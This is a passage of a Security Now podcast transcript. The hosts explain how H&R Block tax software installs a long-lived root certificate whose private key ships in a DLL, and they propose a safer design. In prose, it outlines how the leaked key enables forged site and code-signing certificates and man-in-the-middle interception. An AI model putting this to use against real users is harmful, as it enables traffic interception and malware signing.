SN 1071: Bucketsquatting - Meta and TikTok's Tracking Pixels
Security Now (Audio)March 25, 2026
1071
2:47:44153.65 MB

SN 1071: Bucketsquatting - Meta and TikTok's Tracking Pixels

When convenience trumps caution, disaster waits in the wings. Join Steve Gibson and Mikah Sargent as they break down the jaw-dropping oversights lurking in mission-critical tax and cloud tools, and examine how a single unchecked decision can upend internet security for years.

  • H&R Block's tax software does something SO WRONG.
  • The Intoxalock breathalyzer calibration cyber attack.
  • Firefox now offers a 100% free built-in VPN.
  • TikTok and Meta's tracking pixels are so much more.
  • Russians beg for the return of Telegram, WhatsApps and others.
  • Never connect your crypto-wallet to an unknown service.
  • What would a week be without a Cisco CVSS of 10.0.
  • Ubiquiti patches a 10.0 critical flaw.
  • Listener feedback and...
  • What's "Bucketsquatting" and what can be done to prevent it

Show Notes - https://www.grc.com/sn/SN-1071-Notes.pdf

Hosts: Steve Gibson and Mikah Sargent

Download or subscribe to Security Now at https://twit.tv/shows/security-now.

You can submit a question to Security Now at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Join Club TWiT for Ad-Free Podcasts!
Support what you love and get ad-free audio and video feeds, a members-only Discord, and exclusive content. Join today: https://twit.tv/clubtwit

Sponsors:

When convenience trumps caution, disaster waits in the wings. Join Steve Gibson and Mikah Sargent as they break down the jaw-dropping oversights lurking in mission-critical tax and cloud tools, and examine how a single unchecked decision can upend internet security for years.

  • H&R Block's tax software does something SO WRONG.
  • The Intoxalock breathalyzer calibration cyber attack.
  • Firefox now offers a 100% free built-in VPN.
  • TikTok and Meta's tracking pixels are so much more.
  • Russians beg for the return of Telegram, WhatsApps and others.
  • Never connect your crypto-wallet to an unknown service.
  • What would a week be without a Cisco CVSS of 10.0.
  • Ubiquiti patches a 10.0 critical flaw.
  • Listener feedback and...
  • What's "Bucketsquatting" and what can be done to prevent it

Show Notes - https://www.grc.com/sn/SN-1071-Notes.pdf

Hosts: Steve Gibson and Mikah Sargent

Download or subscribe to Security Now at https://twit.tv/shows/security-now.

You can submit a question to Security Now at the GRC Feedback Page.

For 16kbps versions, transcripts, and notes (including fixes), visit Steve's site: grc.com, also the home of the best disk maintenance and recovery utility ever written Spinrite 6.

Join Club TWiT for Ad-Free Podcasts!
Support what you love and get ad-free audio and video feeds, a members-only Discord, and exclusive content. Join today: https://twit.tv/clubtwit

Sponsors:

[00:00:00] Coming up on Security Now, Steve Gibson is here and I am filling in for Leo Laporte. Kick off the show with H&R Blocks tax software. Well, it's doing something pretty wild and Steve has a suggested fix for it. We also talk about what happens when breathalyzer firmware needs to be calibrated. Plus, Russians want Telegram and WhatsApp to return to Russia. And very important, we finally look at the bottom of the screen.

[00:00:30] We'll learn what bucket squatting means and what can be done to fix it. All of that plus so much more coming up on Security Now. Podcasts you love. From people you trust. This is TWIT.

[00:00:50] This is Security Now, Episode 1071 with Steve Gibson and me, Micah Sargent. Recorded Tuesday, March 24th, 2026. Bucket Squatting. It's time for Security Now. And if you're hearing this voice and going, that's not Leo Laporte, well, good for you. You've got a good ear for voices. I am Micah Sargent.

[00:01:11] Leo Laporte is not here with us this week. He'll be back. Don't you worry. But until then, I am excited to be joined by the ever knowledgeable Steve Gibson. Hello, Steve.

[00:01:25] Mike, great to be with you again. Leo told us last week that the RSA conference is going on in San Francisco. And so he and Lisa are there shaking hands with past and present and maybe even future advertisers for security related things. So glad to have you filling in for him. It's always a pleasure to get to join you.

[00:01:51] Well, yeah. And, you know, once upon a time when we had Father Robert, he was our backstop for Leo. And now we got you. So that's great. Yeah. Good to be here. Now, good. Go. I was just going to say this is Security Now episode 1071 for March 24th, 2026. Two days as it happens before my 71st birthday.

[00:02:17] So, wow, I will be. Yeah, I feel great. So good. Happy early birthday. Good security now episode 2000 before very much longer that today's episode is titled bucket squatting for.

[00:02:36] And this has nothing to do with like something you have to do when you're camping. This is about an interesting problem that Amazon has had for years, which it turns out represents a surprisingly serious security vulnerability, which we're going to cover in detail. But, wow, there's a bunch of other really cool things that have happened in the last week.

[00:03:06] It turns out that H&R blocks tax software there. I think it's that I think they call it the enterprise 2025 tax stuff is doing something that is so very wrong.

[00:03:21] Also, a cyber attack has hit a company called Intoxalock, which provide breathalyzers to enable the ignition systems on automobiles whose drivers need to prove their sobriety before driving. That's an interesting story. We've also got Firefox now as of today.

[00:03:45] We should be at Firefox one nine one one forty nine as of today offering a free built in VPN. Also, TikTok and Meta's tracking pixels turn out to be doing much more than we believed. Russian citizens are begging to get their instant messaging back with, you know, Telegram, WhatsApp and so forth, which the Russian government have said, no, no messaging for you.

[00:04:14] We've also got the lack of wisdom of connecting your crypto wallet to an unknown service yet another. And what would a security now podcast be if we didn't have a Cisco CVSS of ten point zero? Yes, you're just getting them confused at this point because there's so many of them. But Cisco is not alone. Ubiquity also had a ten point zero CVSS critical flaw that needs to get patched.

[00:04:42] We've got some interesting listener feedback. And then what is exactly bucket squatting and what can be done to prevent it? So, you know, maybe we have some things to talk about this week. I don't know. Sounds like it. So look, maybe a few things to talk about. I'm looking forward to learning about bucket squatting. I'll tell you that. You know, it's a good exercise move. Surely works on the thighs. That's true. Strengthen those whatevers.

[00:05:13] Yeah, exactly. The whatevers. But as you all know, this is the time where after our wonderful summary of what's to come, we take a moment to cut to an ad break. And Leo will be here for you for that. Hi, Leo. Hi, Micah. Hi, Steve. Sorry I couldn't be here. I'm at RSA right now having a great time, I'm sure. But I did want to come back and tell you about our sponsor for this episode of Security Now,

[00:05:42] Hawks Hunt. Actually, I'm meeting with them at RSA in just a little bit. As a security leader, you've been there. The eye rolls during training. You're making us do this. The one size fits all phishing simulations that your employees spot a mile away. They don't learn anything from that. And that report button that gets ignored more often than not. Your programs are running, but it's not changing employee behavior. And isn't that what it's all about?

[00:06:09] Meanwhile, AI is making real attacks more convincing by the day. And leadership is starting to ask the question you don't have a clear answer to. Is this actually working? Well, Hawks Hunt is built to answer that. Hawks Hunt empowers your employees to spot and stop phishing attacks. It drives measurable behavior change. And it does it in a fun way through personalized, gamified micro training. No more eye rolls.

[00:06:37] It's just engaging and fun. And it's how people learn. It's powered by AI and behavioral science. And you'll love it as an admin because Hawks Hunt does all the heavy lifting. The simulations run automatically and not just email. These days, it's got to be everywhere. They run an email in Slack and Teams. It's like real phishing attacks personalized to each employee based on role, location, and behavior.

[00:07:02] Every simulation uses AI to mirror those real world attacks, meaning employees are tested on what's actually getting through. Not outdated templates they recognize immediately. No messages from Nigerian princes. They know better than that now. Gamified training keeps engagement high without feeling punitive. Your employees will love it. And you'll love it too. And because every interaction generates a coaching moment, you're not just tracking completion.

[00:07:31] You're building behavioral indicators that tell a real story. You get reporting rates, repeat clicker reduction, and time to report. The kind of metrics that hold up when the leadership asks the hard questions. You could say, yeah, got it right here. You don't have to take my word for it. With over 3,500 verified reviews on G2, Hawks Hunt is the top-rated security training platform. Recognized for best results and easiest to use.

[00:07:59] It's also recognized as a customer's choice by Gartner. And thousands of companies use Hawks Hunt, Qualcomm, DocuSign, Nokia. They trust Hawks Hunt to train millions of employees worldwide. Visit hawkshunt.com slash security now today to learn why modern secure companies are making the switch to Hawks Hunt. That's hawkshunt.com slash security now. Now back to the show. All right. Thank you, Leo, for that.

[00:08:29] Let us get into the show. The good stuff. So, um, last week we, I showed this picture, same picture that we have here, but with a different caption. I, I thought this picture was so bizarre that I would just put it out to our listeners to say, give me an idea for a caption. Uh, and so that was the, that, that was a caption contest last week.

[00:08:56] Um, I got flooded with a huge range of very fun and creative, uh, bits of feedback. I settled on one. I settled on one, which I like, uh, I settled on one, which I like because clearly what we're seeing here with this insane communications, telephone pole, a power pole, whatever the hell it is. It's beautiful. It's beautiful.

[00:09:23] This, this demonstrates like what, 50 years of accumulation. Clearly this did not happen in a day, right? It used to be initially when, when, when that pole was erected and the first lines were run to it, I'm sure down there in the core. Very deeply is, is, is what was there originally beautiful, probably made sense. You could take a look at it and see what was going on everything.

[00:09:51] You know, you, it was like, it was perfect then like, Oh, but wait a minute. We need to add another trunk line. So, okay. Tack that onto the side and, and wire it in. And then who knows how many decades pass and you end up with what could, you know, affectionately be called a rat's nest of wires. So I gave it. It's a, it's a rat King's nest.

[00:10:17] You know, yeah, I gave, and then there's some poor worker guy up there on the top, like draw trying to add just one more wire. I just need one more wire to deal. Anyway, so I gave this thing, the caption, a contemporary visualization of the Microsoft windows code base. This is the caption you added. Yes. That's my cat. It's for beautiful. Steve. I read that and I thought, yes, yes.

[00:10:47] Oh, I think that. And I mean, that's what we see with windows, right? I mean, and in all fairness, it's not just windows. It's any old code base that has been evolving over time where you can't really throw away the old code because it's working and things depend upon it being the way it is. So we're just going to add to it. We're going to, you know, you know, and we've got, you know, windows now has multiple APIs.

[00:11:17] I hear Paul Therat talking about how, you know, oh, nobody codes to that API anymore. Well, of course I do, but not, you know, other normal coders. So anyway, I thought this was a great caption. And it's a variation on an idea that I got from one of our listeners. So thank you for that. And thank you, everyone, for sharing your ideas. Okay.

[00:11:41] So this first goodie is where we're going to spend some time this morning because or this podcast, because there's a lot here to unpack. And I really think our listeners are going to find this interesting. The first mention of this goes to a listener, a credit for the first mention, Jack Christensen, who first pointed me at this.

[00:12:08] Since then, the Hacker News and other security outlets have picked up on this and shared it. Jack provided a note with included a link to the original Y Combinator posting, whose Chinese author, a guy named Yifan Liu, Y-A-F-A-N, last name Liu, L-U, Yifan Liu.

[00:12:38] He appears to know his way around TLS and web servers, as we will see. So here's what Yifan posted to Y Combinator last week. He said just a he said PSA, but we know that stands for public service announcement for folks here in the U.S. because tax season is coming up and some of you may be using business, not enterprise, HR block business 2025.

[00:13:06] He said, I discovered that the software. I get a load of this, folks. I discovered, he wrote, that the software installs a root CA named WKATX Server Host 2024.

[00:13:25] So a root certificate authority, WKATX Server Host 2024, with an expiration in 2049. Yes, 23 years from now. He said, into your local machine's trusted root certificate store.

[00:13:50] They also helpfully include the private key to this certificate in a DLL file. He says this certificate does not identify itself as H&R block anywhere and does not get uninstalled when you uninstall the software.

[00:14:13] He said, I've been able to successfully use this root CA plus MITM proxy, which is a software package, man in the middle proxy, to manipulate TLS traffic on a brand new virtual machine on the same network with a DNS spoofing attack. And he gives us then a link in his posting to a YouTube video. And I've got the link in the show notes for anyone who's interested.

[00:14:42] He said, to test if your machine is vulnerable, visit this page. And now we have a URL to a host on his domain. It's https colon forward slash forward slash HR, as in, you know, H&R block, hrbackdoor.yifanlu.com.

[00:15:10] So this is a TLS, a secure HTTPS secure connection to a web server on his domain that is carrying a certificate he made using this root CA that was installed in everyone's machine who has H&R block business 2025.

[00:15:38] Thanks to the fact that they also provided the private key for this root certificate, which you shouldn't, which should never be there. Anyway, he says, go to this URL. And if you do not get any warning or error message from your browser, then you have the back door installed. Okay. Now it's not really a back door. I understand, but I think that's a popular term.

[00:16:06] It's frightening and scary as we'll see. Maybe, I don't get how this is a back door, but it's not a good door. You know, maybe a side door. He said, if your browser does, does complain, you can choose to visit the page anyway for more details on the vulnerability. And I did. And I'll tell you about what I found in a second.

[00:16:32] So he says, is it negligence or a real back door? It's impossible to tell. And since the private key is out there, anyone can use it. So the point is moot. There's no legitimate reason. And boy, do I agree. And as we'll see, I'm going to demonstrate how we don't need this. Why they need to install a wildcard root CA under a different name.

[00:17:03] When I contacted them, and I'll be sharing the timeline of that later. When I contacted them about it, their statement includes, quote, similar findings have been identified through internal security assessments, unquote. He said, meaning they know about this issue, but have not fixed it. He said, I would not trust H&R Block software at this point.

[00:17:29] If you did not get bit by this, congratulations. He said, see this post as a reminder to audit your trusted root CA store. That is, in other words, take this post as a reminder to go take a look and see what cruft things may have installed behind your back for their own purposes. Because, unfortunately, as this demonstrates, that can happen.

[00:17:58] And it's not good. Okay, so let's reverse engineer this to figure out what's going on here. First, again, I want to be very clear that having H&R Block install its own root certificate into the certificate authority root store of every single person who installs their tax preparation software. And then, I mean, that's bad enough.

[00:18:27] And then, even worse, to leave it there forever with an expiration date in the year 2049. And, you know, Micah, I do think the podcast will probably not last that long. So, we're not going to be here to celebrate the expiration of the H&R Block root certificate. So, this will remain valid for the next 23 years.

[00:18:57] Doing that on H&R Block's part is the height of hubris and irresponsibility. Responsibility. Now, I don't want to spoiler. So, if you are going to talk about this, then you can just say that it'll be a spoiler. But I know that when it comes to the practically minded, particularly those in the security world, perhaps the motivation is not as important as the impact.

[00:19:23] But I would love to know, do you have any thoughts about why make this choice of a certificate that doesn't – is it just pure laziness? You talk about hubris and irresponsibility here. That just seems like, well, one would say, that's a choice. I mean, they made a choice. Yeah. And, in fact, I'm going to explain the dangers and then I'm going to explain the reason for it.

[00:19:52] And then we're going to show how the same thing could be achieved in a completely secure fashion. Excellent. So, I had a lot of fun with this because we've never – we've never in the 21 years of the podcast haven't seen this and gone into it. So, it's a great opportunity to really dig in. Yes. Okay.

[00:20:15] So, remember that the way all this works is that a root certificate has signed itself and has declared itself to be a certificate authority certificate. Certificates have a whole bunch of things they can be labeled and they can also contain constraints on their own behavior.

[00:20:38] That is, constraints that they broadcast on what things they can be used for. So, this is an unconstrained certificate authority certificate, which is the most potent form of certificate you could have.

[00:20:57] So, just as with any root certificate authority certificate, the purpose of that certificate, that self-signed certificate, is to verify the signature of any other certificate that it might have signed using its matching private key. It contains the public key. It contains the public key.

[00:21:20] So, its private key signs something which the root certificate's public key can be used to verify. So, it can verify, but it can't itself sign. That's the beauty of this public key, you know, division of labor between private and public keys. So, the CA's private key, consequently, like for DigiCert, right? They're a CA.

[00:21:46] Their private key is the most prized, protected, and safeguarded piece of information anywhere since any certificate which that super secret protected private key signs will be trusted anywhere that its matching CA certificate containing its matching public key is installed. Okay. Okay.

[00:22:16] So, keeping the private key secret is like so important. Did H&R Block at least keep its installed CA certificate private key secret? Well, no. Riefon told us no. Not even a little bit.

[00:22:34] This intrepid researcher discovered the CA certificate's never-to-be-disclosed matching private key sitting comfortably in a DLL that was included as part of this software's installation.

[00:22:50] We can be certain that this is true since this researcher used the matching CA's private key, which he found in the DLL, to create and sign his own standard TLS web certificate just like a CA would, like a certificate authority, like DigiCert did, when GRC got its most recent certificate. That's what it does.

[00:23:19] So, he created a TLS web certificate using the private key that he found in the DLL in order to create that backdoor.yifonlu.com website, which anybody who installed the H&R Block software can now go to because their machine, their browsers will all trust this certificate that he made for himself.

[00:23:48] When I went there, since I didn't install this H&R Block software, Firefox freaked out, as it should, warned me that the site was attempting to use an untrusted certificate signed by an unknown issuer and that I should proceed no further. I put the dialogue box in the show notes. It says, this is from Firefox. This is from Firefox. Someone could be trying to impersonate the site and you should not continue.

[00:24:16] Websites prove their identity via certificates, writes Firefox. Firefox does not trust HRbackdoor.yifonlu.com because its certificate issuer is unknown, meaning to my computer. Firefox said the certificate is self-signed or the server is not sending the correct intermediate certificates. And so, then we get the error code, SEC error, security error, unknown issuer.

[00:24:46] And you have a link then. You can click on view certificate and see the certificate where we see that everything that Yifon Liu has told us is true. So, this is all exactly what we would want and expect from any browser. And it's what we should receive because, as I said, I never made the mistake of installing H&R Block's 2025 tax prep software.

[00:25:15] But what's significant is that anyone who has ever previously installed HR Block's, you know, business 2025 tax prep software, from now and for the next 23 years, while their purposefully installed CA root certificate remains valid, would not and does not receive any warning or notification.

[00:25:45] At all. Their web browser simply opens that page without complaining. Yifon Liu's, you know, self-cert created page because the signer of Yifan's demo test site certificate will now be known and trusted by their PC because once upon a time, maybe recently, maybe up to 23 years in the future,

[00:26:12] they had installed HR Block's software. Okay, so, so far this is all just happy demonstration test land, right? The reason Yifan has raised the alarm is that the inherent dangers extend far beyond testing.

[00:26:32] Since in addition to installing an untrusted, an untrustworthy certificate authority cert into every PC root store, as I said, and he's proven, H&R Block thoughtfully provided their CR's matching private key.

[00:26:49] Consequently, anyone, anywhere in the world can generate their own TLS web certificates or code signing certificates, any kind of certificate, because there's no constraint on the use of this, that will be trusted without question by any previous user of H&R Block's tax preparation software and for the next 23 years.

[00:27:15] For example, nothing prevents someone from signing a TLS certificate for www.google.com or update.microsoft.com or any other web domain they might choose.

[00:27:31] If traffic can then be rerouted to that maliciously named and now fully trusted server, anyone who had previously installed the H&R Block tax preparation software could be fully spoofed. Their browser would go to web pages at those URLs, they would see matching trusted certificates and be fully spoofed.

[00:28:00] Now, presumably, H&R Block has digitally signed their software, but any of their users who had previously installed their tax preparation software would also now be completely spoofable. Their customers' PCs would download and blindly trust any subsequent software from any source that was signed with a certificate that had been issued with their private key.

[00:28:30] The code signing certificate could say H&R Block or it could say Microsoft Corporation or anything else that fit the malicious need of the moment. Yifan also said in his original Y Combinator posting, he said,

[00:28:47] I've been able to successfully use this root CA and MITM proxy to manipulate TLS traffic on a brand new virtual machine on the same network with a DNS spoofing attack. So let's look at that. We've talked a lot about so-called middle boxes through the years.

[00:29:09] Many corporations use them to allow deliberate MITM, you know, man in the middle, interception in order to examine 100% of the traffic that's passing into and out of their networks.

[00:29:28] They want to protect their employees inside their protected perimeter from anything malicious cruising in to their network under the protection of TLS encryption. And they'd like to prevent corporate trade secrets from being sent out through their network, either inadvertently or deliberately, thanks to the same TLS encryption.

[00:29:56] So to accomplish this, every PC operating inside their corporate network environment must contain the root certificate for that middle box. In other words, a CA root certificate for that middle box. And we hope that it's matching, you know, well-protected inside.

[00:30:21] The matching private key is not extractable. So having all PCs in the enterprise containing that middle box's root certificate and with it having the matching private key, which it's careful never to let anybody else get that allows the middle box to synthesize fake trusted remote website certificates on the fly.

[00:30:51] So here's how that works. Say that someone inside the enterprise attempts to go to chat GPT.com. The middle box will intercept that connection attempt and it itself will go to chat GPT.com on behalf of the user to obtain chat GPT's TLS certificate as if it were a user connecting.

[00:31:19] It will duplicate many of the details of chat GPT certificate, but it will sign that new cloned certificate with its own internal private key. And it will then return that cloned certificate to the enterprise user who will believe they've connected directly and privately to chat GPT.

[00:31:46] Their browser will show www.openai or chat GPT.com or whatever the URL is. However, they've actually connected to their enterprise's middle box, which is masquerading as chat GPT, which it can do because their PC contains that root CA for the middle box.

[00:32:12] Therefore, middle box created certificates are trusted inherently. Now, all of this may seem like a lot to go through, but it's the only thing that allows the enterprise to monitor the TLS encrypted communications of its employees to prevent them from, for example, uploading the company's 10 year product planning in order to ask chat GPT what it thinks about those plans.

[00:32:40] Those should not leave the enterprise. So somebody needs to guard those communications.

[00:32:48] Yifan's point about the installation of a root certificate and man in the middle proxy is that for reasons that are not at all clear, H&R Block has thereby, by doing what they've done, they've given themselves all of the same privileges and capabilities as any enterprise business.

[00:33:17] That's too much power. The question is why? That's too much power. Yes. They could intercept all of their customers' communications to any other website. Oh, my God. Why would you want that level? Yes. Why would you want the responsibility? Yeah, that's too much responsibility. Yeah. Thank you.

[00:33:43] The only reason H&R Block would need to include the private key that matches the CA root certificate they installed into their user's machines would be if they needed to create and sign TLS certificates on the fly that would be trusted by that user's machine.

[00:34:06] I don't see any other possible need for the private key being locally present as it is. So, again, why? Why is it? Why is it? capability for wholesale local machine invasive traffic interception and decryption. And there

[00:34:34] doesn't appear to be any reason why tax preparation software would need anything like this. And even if we trust H&R Block and assume that they must have some justifiable basis for having given themselves this capability on every one of their customers' machines that have installed their software, as Yifan himself demonstrated, they will also have given anyone

[00:35:02] else, anyone else like him, this researcher who is aware of this, the same privileges since the CA root cert is installed and its matching private key is sitting in a DLL for anyone to extract and use. I mentioned at the top that we were going to reverse engineer this in an attempt to understand what's

[00:35:28] going on. I haven't seen this H&R Block software and I don't want to let it anywhere near any of my machines. Right. So I have not watched it work. But the only reason I can see that they would do this would be if their software installs and runs a local web server in their user's machine.

[00:35:58] This would allow them to have a fully web browser based user interface and a UI free headless web server that encapsulates all of their tax preparation logic. In other words, we go to Google Docs in order to use

[00:36:21] Google's document application, it would be possible to instead go to H&R Block software server with our browser running on our machine to use their tax prep application delivered to us by a server running

[00:36:44] locally. So clicking, for example, some sort of little startup app would invoke the Windows shell to launch the user's default web browser with a URL like HTTPS colon slash slash 127 001 colon and then like some port

[00:37:07] number 1234 or some custom port number, whatever they wanted to use, you know, or they might have also tweaked the user's hosts file to map a more friendly looking domain name like HR block hyphen tax hyphen prep.com mapping that to 127 001 IP. That way users would see something comforting in their web browser

[00:37:37] URL address bar. But none of that actually explains why they couldn't then just install a root CA and a certificate for that. There's no need to make it up on the fly. I mean, I'm giving them the benefit of every possible excuse here. Okay, so now the user clicks on the startup app, which launches their web

[00:38:04] browser, which accesses their locally running web server. That built in local web server needs to present their browser with a TLS certificate that matches the address they've accessed. Again, 127 001 or HR block tax prep dot com or whatever. Whatever the case, that certificate needs to be trusted by the browser.

[00:38:27] This means that it must have been signed by the private key that matches the root CA certificate that HR block planted into every user's PC. Since the roots subject name, the root, that root certificate subject name,

[00:38:45] as Yifan told us, is WK space ATX space server host space 2024. Okay, it seems unlikely that it would be, you know, used directly as the server's end certificate. That would be a weird string for users to see in their browser's URL bar. It's more likely that the installation process or perhaps, you know, maybe the first time

[00:39:14] you run the system that it would create the built-in web server certificate, which it would have, which it would then have signed using the root CA's private key, which we know is sitting in a DLL. And this is exactly, as I said, what Yifan Liu did when he created his test site. Once all this was done, the built-in web server would offer the user's

[00:39:42] browser, this custom minted TLS certificate, and it would use that certificate's private key, which it must, the web server would have that key, to verify its valid ownership of the certificate it provided to the browser. The point I want to make here is that any web server that's accepting and terminating TLS connections does need to have

[00:40:11] the private key that matches the public key in the certificate, which it provides to the web browser. But that should never be the private key for the CA root certificate. No one does that, right? There is the only thing the root signs is

[00:40:31] another certificate, which is then presented to the web browser. It itself is never used. Thus, you never need its private key to be around. Okay, so when all this was revealed, when Yifan found all this, he did the right thing and reported his

[00:40:53] astonishment and concerns to H&R Block. The timeline of his interactions with them was on March 10th. So today's what, the 24th? So two weeks ago, today, on the 10th, he disclosed to H&R Block through their responsible disclosure policy.

[00:41:16] Two days later, on March 12th, he was asked to, quote, please provide more details about how an attacker would realistically exploit this in practice, unquote, and, quote, share the video proof of concept from start to end, unquote. Three days later, on the 15th, he did that. He wrote, provided H&R Block with details and a proof of concept

[00:41:44] video and told them the deadline for their response is March 20th due to U.S. tax season coming up. On the 20th, he received the following statement back from a H&R Block. After review with the program team, we're closing this report as out of scope. The reported issue involves an executable application

[00:42:12] that falls outside our defined program scope and similar findings have been identified through internal security assessments. Okay, what? So like, yeah, we know. So like, uh, really? It's somebody actually explained to this to you and you're like, eh,

[00:42:39] it's more, that's how it's supposed to work. Okay. Okay. So this is obviously pretty much a head buried in the sand response. Um, they deserve to receive full scrutiny over this very wrongheaded design of their system. And I hope they receive that there can be no doubt that the use of their tax

[00:43:01] preparation software leaves an uninvited, unwanted, and unconstrained root certificate with a 23 year lifetime remaining. And it's known private key sitting in the root store of every customer of their tax preparation software. And it persists even after their software has been uninstalled.

[00:43:32] Okay. Now the one thing we've not examined is what I would do. I, Steve Gibson, if, if I were cold, you know, or if I were contracted with to do this in a secure fashion. So Micah, let's take a break and then we're going to look at that, how to do this right. I am looking forward to hearing how we can do it right after seeing how you can do it. So, so wrong,

[00:43:58] but let's take a break. Uh, Leo Laporte joining us for the next sponsor. Hi guys, real quick. This episode of security now brought to you by guard square mobile apps today. Well, you just listened to the show, you know, they've become an inescapable part of life. We use them all the time, ranging from financial services to healthcare, retail, entertainment, and of course, users trust mobile apps with their sensitive personal data.

[00:44:27] But a recent survey showed that 72% of organizations experienced a mobile application security incident last year, and 92% of respondents reported rising threat levels over the last two years. Doesn't take a survey to know that, right? Now, if you're an app developer, you got to remember your users are trusting you and attackers want your users' personal data. So they're constantly

[00:44:51] finding new ways to attack your mobile app. This is one really awful thing they do. They reverse engineer it easy now using AI. They'll repackage it. They'll distribute your app modified via phishing campaigns, via sideloading, by third-party app stores, any means necessary. And then your users get compromised and who they blame, they blame you. But by taking a proactive approach to mobile

[00:45:18] app security, you can stay one step ahead of these attacks and maintain the trust of your users. That's where guard square comes in. Guard square delivers mobile app security without compromise, providing advanced protections for both Android and iOS apps, combined with automated mobile application security testing to find vulnerabilities, and real-time threat monitoring to gain insight into attacks. You're not helpless anymore. Discover more about how guard square provides

[00:45:47] industry-leading security for your mobile apps at guardsquare.com. That's guardsquare.com. We thank them so much for support and security now. And now back to Mike and Steve, guys. Thank you very much, Leo, for that. We are joined once again by Steve Gibson as we continue on with

[00:46:07] understanding what we would do if tasked with fixing things for H&R Block. Okay. So, first of all, let me reiterate that I'm trying to give these guys every benefit of the doubt. I don't understand why they've

[00:46:27] done this. The only real reason that I can imagine is actually traffic interception. They would need this to act like, you know, in order to act like a middle box to intercept encrypted communications.

[00:46:49] Maybe, and again, I've not seen the software. Maybe they set themselves up and then their app says, okay, now go to irs.com. Go to your bank's website. Go, I mean, like, maybe there are remote cloud-based sources of information,

[00:47:10] which it asks you to look at and while intercepting your communication so that it can suck that stuff in and incorporate it into your tax preparation. I don't know. I mean, it's like the only thing I can imagine now still horrible. I mean, you don't want a proxy that's able to intercept all of your TLS

[00:47:34] connections installed on your machine, let alone left behind after you've uninstalled it. But that's the only thing I can imagine. So, and if, and also, if all they wanted was to be able to run a local web server that your browser trusts, then they would need to install a, their own root cert and the web

[00:48:03] browser would then have a certificate that that root cert has signed. But there would never be the root cert's private key because it wouldn't be necessary. And the only thing that certificate would do would, would be to run a local web browser. You know, web app developers do this all the time. They run a local web server on their machine. It's not a big deal. So H&R Block could have done that

[00:48:31] if that's, that's all they would have needed to do and it could have been safe. But say that for some reason they did need to deploy this on the fly. Even that could be done securely. And here's how. If I wish to deploy a product that included a built-in web server that a user's modern, fully secured web browser could interact with without raising any warnings about insecure connections,

[00:49:00] lack of trust, self-signed certificates and so on. It's possible. So H&R Block, are you listening? Upon installation, the installing software would first generate a state-of-the-art standard 4096-bit public-private key pair. They would not ship that with the product. In other words,

[00:49:29] this thing the H&R Block did was they provided a public key in a, in a root CA and the private key bundled into bound into the DLL. So they shipped those statically, which means anyone who gets a copy of one has what they need for all H&R Block users, which is where the problem is. No, instead,

[00:49:56] generate it on the fly. Generate your own 4096-bit public key pair on the fly so that no two installations ever share the same keys. The public key half would be contained within a, to your point, a short-lived root certificate. You know, having a lifetime of the expected duration of the product's

[00:50:24] use, maybe 90 or 120 days for tax preparation software. Micah, as you pointed out, there's no reason for it to live any longer. Yeah. Especially because people are going to reinstall it again the next, if they uninstall or something. The theory is they're going to install it again and use it again next year. And you, since it's able to make a certificate, if it did expire, it could just make

[00:50:48] a new one. Yeah. Even it itself could just bump this along forward, you know, always installing a few months worth of, of root CA that will gracefully properly expire after a few months. You'd like to have the uninstaller remove it because you don't want to just have this, all this crap accumulating in,

[00:51:09] in your, your, your users root stores, but okay. Um, in addition, it should tightly constrain the use of the certificate so that it can only ever be used to sign a TLS end certificate. Those are constraints that could be added to the CA. They didn't do that either. Okay. Next, it generates a second

[00:51:35] 4k bit public private key pair. It uses this second key pair to create the web servers, local site certificate. So that's for, that's going to be that that's the certificate for the server that the server will send to the browser, to the, to the user's local browser. And it would name it something like, you know, HR block dot local host. That would be a safe name. Dot local host is reserved

[00:52:03] for the local host as a sort of a local host pseudo domain. So HR block dot local host, which would mean that certificate could never be misused, um, in, in any, uh, useful fashion. It would only ever be able to serve and encrypt and authenticate TLS connections in order for this local

[00:52:29] site certificate to be trusted on that local machine. It needs to be signed by the root certificates, private key. That first one that was made, you know, the one belonging to the just created local root CA. And then here's what's what's crucial and cool immediately after that root CA's private key was used to sign the local site

[00:52:57] certificate. That private key is securely overwritten and deleted. The point is that private key is never written to non-volatile storage. So it is now permanently gone. And the locally installed root certificate, can never be abused because it's matching private key, which is required for its abuse. No longer exists.

[00:53:26] It was just, it was ephemeral. It was transient. It's gone since its private key was only ever needed once to sign the local certificate to prove that certificate's validity. It should never be retained. So the installation then in my system would, in my solution would add an entry to the system's hosts file,

[00:53:52] which maps HR block dot local host to one 27, zero zero one. So now we have a certificate named HR block dot local host with a unique public and private key pair that will only ever be trusted by a similarly unique root CA, which will itself expire a few months after it was created. Any local browser can now be directed

[00:54:20] to some unique port. I guess 80 if it's free, but you might want to do, you know, eight, eight, eight, eight, just to, for the sake of being out there somewhere. So, you know, HR block dot local host colon eight, eight, eight, eight, eight. And now you're able to access the built-in web server in order

[00:54:41] to view the eight, the HR block UI, uh, in a server client relationship. And lastly, on its way out, the software's uninstaller should remove the short lived root CA certificate after it shuts down the local web server and deletes all of the products files. So it has, we've just seen in this example,

[00:55:08] it is, if you really needed to do this for some reason, I don't see even why you have to, because you could just, uh, you know, give somebody a set of static search that would only be useful for local, for HR block dot local host. But if you, even if you needed, if you wanted every instance to be unique and I can see a benefit there, it can be done in a way that does not open any security

[00:55:35] holes, but that's not what H and R block has done through very poor security design, sloppiness. And as you said, apparently not caring, you know, they've left behind a 23 year lifetime, completely unconstrained CA root certificate, meaning it can sign TLS, uh, web certificates.

[00:56:00] It can sign code. It could be used for any malicious purpose. You can imagine left behind in the root store of every one of their, uh, users with its matching key statically embedded in a shipping DLL so that it's known to the world. Um, this makes you wish that our industry's software liability protections were not as virtually non-existent as they currently are. I mean, I'm sure somewhere in a,

[00:56:30] in the, in the license agreement that all users click on not reading because you can't, you know, there's 25 pages of legalese, you know, it says, you know, uh, you know, you are by using the software, you agree to hold us harmless of any damage that may arise, you know, even if we'd been informed beforehand that such damage could occur, the license agreements all say that. And so it's like,

[00:56:55] eh, we can do anything we want to your computer. That's so frustrating to me. And that, because I was going to say, you know, I'm always, I'm always curious. He reached, or this person reached out to H&R Block. H&R Block had to know that if this was coming from truly a security researcher, that this was going to be made public as opposed to it just being some, you know, I would

[00:57:21] imagine that if you just heard from some random person, uh, that did not, you know, but put themselves forth as a security researcher at all. They might go, Oh, we can bury this or this won't matter. But to say, basically, we don't care to someone who is going to disclose that that's the stuff where I'm like, I want to meet every person involved in every part of these decisions and just hear what their thinking is, because what is their thinking and why would they feel

